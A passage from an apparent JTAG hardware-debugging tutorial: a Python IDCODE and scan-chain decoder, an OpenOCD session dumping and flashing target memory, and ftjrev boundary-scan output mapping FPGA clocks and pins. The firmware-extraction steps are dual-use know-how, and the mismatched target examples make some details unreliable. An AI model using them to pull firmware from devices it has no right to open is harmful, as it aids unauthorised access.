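        return (f"0x{self.raw:08x} (mfg: 0x{self.manufacturer:03x} ({self.manufacturer_name}), "
                f"part: 0x{self.part:04x}, ver: 0x{self.version:x})")


def decode_idcode(raw: int) -> IdCode:
    kind = classify(raw)
    if kind != "idcode":
        raise ValueError(f"not a valid IDCODE: {kind}")
    raw &= ALL_ONES
    return IdCode(raw, (raw >> 1) & 0x7FF, (raw >> 12) & 0xFFFF, (raw >> 28) & 0xF)


def parse_openocd_tap_line(line: str) -> Optional[IdCode]:
    """Extract and decode the IDCODE from an OpenOCD 'tap/device found:' log line."""
    m = re.search(r"tap/device found: (0x[0-9a-fA-F]{8})", line)
    return decode_idcode(int(m.group(1), 16)) if m else None


def decode_chain(dr_bits: int, nbits: int) -> List[Optional[IdCode]]:
    """Walk a raw DR scan taken from Test-Logic-Reset (bit 0 = first bit received).

    A 0 bit is a device in BYPASS (recorded as None); a 1 bit starts a 32-bit
    IDCODE. Decoding stops at an all-ones word, which is what comes back once
    the scan runs past the end of the chain with TDI held high (assumption).
    """
    devices: List[Optional[IdCode]] = []
    pos = 0
    while pos < nbits:
        if (dr_bits >> pos) & 1 == 0:
            devices.append(None)
            pos += 1
            continue
        word = (dr_bits >> pos) & ALL_ONES
        if word == ALL_ONES:
            break
        if pos + 32 > nbits:
            raise ValueError("scan ended in the middle of an IDCODE")
        devices.append(decode_idcode(word))
        pos += 32
    return devices


if __name__ == "__main__":
    for line in (
        "Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)",
        "Info : JTAG tap: mt7620.cpu tap/device found: 0x1635224f (mfg: 0x127 (MIPS Technologies), part: 0x6352, ver: 0x1)",
    ):
        print(parse_openocd_tap_line(line))
    print(decode_idcode(0x2295C093))   # ftjrev's XC5VLX330: Xilinx, part 0x295c, ver 2
```

The manufacturer code alone does not tell you the IR length, which is why OpenOCD's auto-probe warning above still has to supply "-irlen 4" for the jtag newtap line; take that value from the probe (or the vendor's BSDL file), not from the IDCODE.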

Connecting to the telnet console:

>>> telnet localhost 4444
Trying ::1...
Connection failed: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> reset halt
Can't assert SRST: nSRST signal is not defined
JTAG scan chain interrogation failed: all ones
Check JTAG interface, timings, target power, etc.
Trying to use configured scan chain anyway...
sam7x512.cpu: IR capture error; saw 0x0f not 0x01
Bypassing JTAG setup events due to errors
Can't assert SRST: nSRST signal is not defined
ThumbEE -- incomplete support
target halted in ThumbEE state due to watchpoint, current mode: System
cpsr: 0xffffffff pc: 0xfffffff9
srst pulls trst - can not reset into halted mode. Issuing halt after reset.
NOTE! DCC downloads have not been enabled, defaulting to slow memory writes. Type 'help dcc'.
NOTE! Severe performance degradation without fast memory access enabled. Type 'help fast'.
> dump_image dump_proxmark3.pin 0x100000 0x100000
dumped 1048576 bytes in 15.351289s (66.704 KiB/s)
> reg
> flash info 0
> flash list
> flash banks

The chain interrogation failed here too (all ones, cpsr and pc reading back as all ones), so the dump_image that "succeeded" is almost certainly 0xff filler from a dead chain rather than flash contents. Check a dump with xxd or strings before trusting it.

CPU commands:

# Reset and halt the CPU
> reset halt
# Show registers
> reg
# Reset and let the CPU run (use "resume" to continue without a reset)
> reset run

Memory commands:

# Get flash information
> flash info 0
> flash list
> flash banks
# Dump memory to a file (here 16 MiB of the Raspberry Pi kernel mapping)
> dump_image raspi_kern_c0.bin 0xc0000000 0x01000000
# Erase the affected sectors and write an image to flash
> flash write_image erase "Desktop/FirstApp.hex"

Using ftjrev

Scan JTAG for Clocks

Scanning for clocks:

$ ./ftjrev clocks
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37

Scanning for devices and pin-to-pin connections:

$ ./ftjrev scan
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Pin pass...
0[XC5VLX330-FFG1760]:IO_BB13 --> 2[XC5VLX330-FFG1760]:IO_AT16
0[XC5VLX330-FFG1760]:IO_AY12 --> 2[XC5VLX330-FFG1760]:IO_AW17
0[XC5VLX330-FFG1760]:IO_AY13 --> 2[XC5VLX330-FFG1760]:IO_AT20
0[XC5VLX330-FFG1760]:IO_BA11 --> 2[XC5VLX330-FFG1760]:IO_AT19
0[XC5VLX330-FFG1760]:IO_BB11 --> 2[XC5VLX330-FFG1760]:IO_AT17
0[XC5VLX330-FFG1760]:IO_BB12 --> 2[XC5VLX330-FFG1760]:IO_AU16
0[XC5VLX330-FFG1760]:IO_AW12 --> 2[XC5VLX330-FFG1760]:IO_AW18
0[XC5VLX330-FFG1760]:IO_AW11 --> 2[XC5VLX330-FFG1760]:IO_AV35

Scanning for input pins (ftjrev reports pins whose sampled value changes while you probe the board):

$ ./ftjrev iprobe
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Probing inputs, press ctrl+c to stop...
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20

Scanning for output pins (the pin names are streamed to a serial port so they can be read while probing):

$ stty -F /dev/ttyUSB2 speed 115200
$ ./ftjrev oprobe > /dev/ttyUSB2
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
Probing outputs, press ctrl+c to stop...

Basic target control (OpenOCD telnet console):

  • halt
  • resume
  • step

Using UrJTAG